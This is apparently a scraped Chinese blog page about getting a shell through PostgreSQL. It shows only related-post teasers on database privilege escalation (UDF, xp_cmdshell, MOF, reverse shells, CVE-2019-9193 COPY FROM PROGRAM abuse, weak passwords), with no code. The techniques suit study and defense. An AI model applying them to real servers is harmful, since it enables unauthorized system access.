渗透中利用postgresql getshell - JF ’ blog

Windows数据库-mysql&mssql&Oracle数据库
网络空间安全学习
04-01 1574
Windows-数据库-MySQL-MSSQL-Oracle MySQL UDF、反弹shell、启动项、mof MSSQL系统函数-使用系统函数 Oracle 数据库 可使用Oracle shell工具进行操作
PostgreSQL命令执行漏洞(CVE-2019-9193)复现
技术超强的网络安全平台
08-01 512
PostgreSQL( 读作 Post-Gres-Q-L)是一个功能非常强大的、源代码开放的客户/服务器关系型数据库管理系统(RDBMS)。采用类似MIT的许可协议,允许开发人员做任何事情,包括在开源或闭源产品中商用,其源代码是免费供的。 PostgreSQL是一个功能强大对象关系数据库管理系统(ORDBMS)。由于9.3增加一个“COPY TO/FROM PROGRAM”功能。这个功能就是允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令。 进入目录
Windows数据库
最新发布
starry_ke
07-08 333
摘要:本文总结了常见数据库流程和技术,包括MySQLMSSQL、Oracle、PostgreSQL、Redis和Memcached等数据库方法。涉及获取数据库凭证、利用漏洞执行系统命令等技术手段,如UDF、xp_cmdshell、CVE漏洞利用等。同时介绍了解决数据库外联问题的方法,如建立代理或修改数据库配置开启外联。最后推荐了几款数据库工具,并供了相关服务的启停命令和参考案例链接。文章技术性较强,主要面向安全研究人员进行漏洞复现研究。
PostgreSQL 辟谣存在任意代码执行漏洞:消息不实
weixin_34221036的博客
04-12 436
开发四年只会写业务代码,分布式高并发都不会还做程序员? >>> 近期在互联网媒体上流传 Postgr...
PostgreSQL 任意命令执行漏洞(CVE-2019-9193)
信息安全
10-03 1294
记一次授攻击通过PostgreSql弱口令拿到服务器限的事件。使用靶机复现攻击过程。
数据库(实战案例)
2201_75341517的博客
06-13 1958
本文主要介绍常见数据库如何进行操作,如mysql(mof,udf,启动项),mssql,orcale数据库
-MY&MS&ORA数据库
qi_SJQ_的博客
02-01 1692
数据库: 在利用系统溢出漏洞无果的情况下,可以采用数据库进行来获得系统限,不是数据库用户的限,但需要知道数据库的前条件:服务器开启数据库服务及获取到最高限用户密码。除 Access 数据库外,其他数据库基本都存在数 据库的可能。 #数据库应用升中的意义 #WEB 或本地环境如何探针数据库应用 #数据库限用户密码收集等方法 #目前数据库对应的技术及方法等 流程:服务探针->信息收集->利用->获取限 探针查看是否...
(CVE-2019-9193)PostgreSQL命令执行漏洞的复现
m0_69801663的博客
12-23 1496
(CVE-2019-9193)PostgreSQL命令执行漏洞
PostgreSQL命令执行漏洞(CVE-2019-9193)
SoulCat
05-27 4222
PostgreSQL命令执行漏洞(CVE-2019-9193) 最美好的大概还是那些初识的日子,是对彼此不全然地了解又极度渴望了解的那段时光。 漏洞概述: PostgreSQL是一个功能强大对象关系数据库管理系统(ORDBMS)。由于9.3增加一个“COPY TO/FROM PROGRAM”功能。这个功能就是允许数据库的超级用户以及pg_read_server_files组中的任何用户执...
PostgreSQL 存在内存泄露漏洞(CVE-2022-41862)
murphysec的博客
03-09 1415
PostgreSQL是一个由PostgreSQL组织开发的自由对象关系型数据库管理系统。 该项目的受影响版本存在内存泄漏漏洞。该漏洞是由于在建立连接时采用libpq库建立连接的客户端对于接收的字节长度没有限制所导致的。 当libpq客户端缓存了Kerberos凭据并且没有显式禁用选项gssencmode时,攻击者便可控制PostgreSQL服务器在建立Kerberos传输加密时发送一个未终止的字符串,致使libpq客户端过度读取接收缓冲区后面的数据,包括未初始化的字节。继而,将这些未初始化的字节与错误
数据库
2401_83237906的博客
11-24 1103
DLL(动态链接库,Dynamic Link Library)是微软 Windows 操作系统中用于存储可执行代码和数据的文件格式。它允许不同的程序共享相同的代码和资源,以便更加高效地使用内存和其他计算机资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值